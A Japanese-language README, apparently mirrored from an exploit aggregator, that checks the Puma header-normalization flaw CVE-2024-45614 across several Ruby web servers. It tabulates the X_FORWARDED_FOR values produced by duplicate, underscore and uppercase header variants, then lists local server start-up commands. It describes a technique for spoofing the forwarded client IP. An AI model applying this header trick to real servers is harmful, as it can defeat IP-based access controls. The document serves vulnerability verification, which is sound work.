Share
## https://sploitus.com/exploit?id=DC17AA5A-9D33-5ECF-874A-23BAEC6A8042
Puma Header normalization CVE-2024-45614 確認
===
- advisory: https://github.com/puma/puma/security/advisories/GHSA-9hf4-67fc-4vf4
- 修正コミット: https://github.com/puma/puma/commit/cac3fd18cf29ed43719ff5d52d9cfec215f0a043
### 結果
[request.rb](requests.rb)の実行結果
#### duplicate
| 対象 | 結果 |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 2.2.2.2 |
#### under_score
| 対象 | 結果 |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 1.1.1.1 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 1.1.1.1 |
| pitchfork_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 1.1.1.1 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
#### reverse_under_score
| 対象 | 結果 |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 1.1.1.1 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 1.1.1.1 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
#### upper_case
| 対象 | 結果 |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 2.2.2.2 |
#### reverse_upper_case
| 対象 | 結果 |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 2.2.2.2 |
### 各サーバ起動
#### Puma
```
# CVE-2024-45614修正前 Rack2
$ cd puma_before_fix_rack2
$ RACK_ENV=production bundle exec puma -p 9000 ../config.ru
# CVE-2024-45614修正前 Rack3
$ cd puma_before_fix_rack3
$ RACK_ENV=production bundle exec puma -p 9001 ../config.ru
# CVE-2024-45614修正後 Rack2
$ cd puma_after_fix_rack2
$ RACK_ENV=production bundle exec puma -p 9002 ../config.ru
# CVE-2024-45614修正後 Rack3
$ cd puma_after_fix_rack2
$ RACK_ENV=production bundle exec puma -p 9003 ../config.ru
```
#### Pitchfork
```
# Rack2
$ cd pitchfork_rack2
$ RACK_ENV=production bundle exec pitchfork -p 9010 ../config.ru
# Rack3
$ cd pitchfork_rack3
$ RACK_ENV=production bundle exec pitchfork -p 9011 ../config.ru
```
#### Unicorn
```
# Rack2
$ cd unicorn_rack2
$ RACK_ENV=production bundle exec unicorn -p 9020 ../config.ru
# Rack3
# * 調査時のバージョンではRack3の対応は完了していないが、サーバは動く
$ cd unicorn_rack3
$ RACK_ENV=production bundle exec unicorn -p 9021 ../config.ru
```
#### Thin
```
# Rack2
$ cd thin_rack2
$ RACK_ENV=production bundle exec thin start -p 9030 -R ../config.ru
# Rack3
# * 調査のバージョンではRack3に未対応であり、bundle installができない
```
#### Falcon
* 確認しやすくするためにHTTP1で起動
```
# Rack2
$ cd falcon_rack2
$ RACK_ENV=production bundle exec rackup --server falcon -p 9040 ../config.ru
# * 動かせていない
# Rack3
$ cd falcon_rack3
$ RACK_ENV=production bundle exec rackup --server falcon -p 9041 ../config.ru
```
#### Nginx
```
$ docker run --name heade_test_nginx -v $(pwd)/nginx.conf:/etc/nginx/nginx.conf:ro -d -p 9100:80 -p 9101:81 nginx
```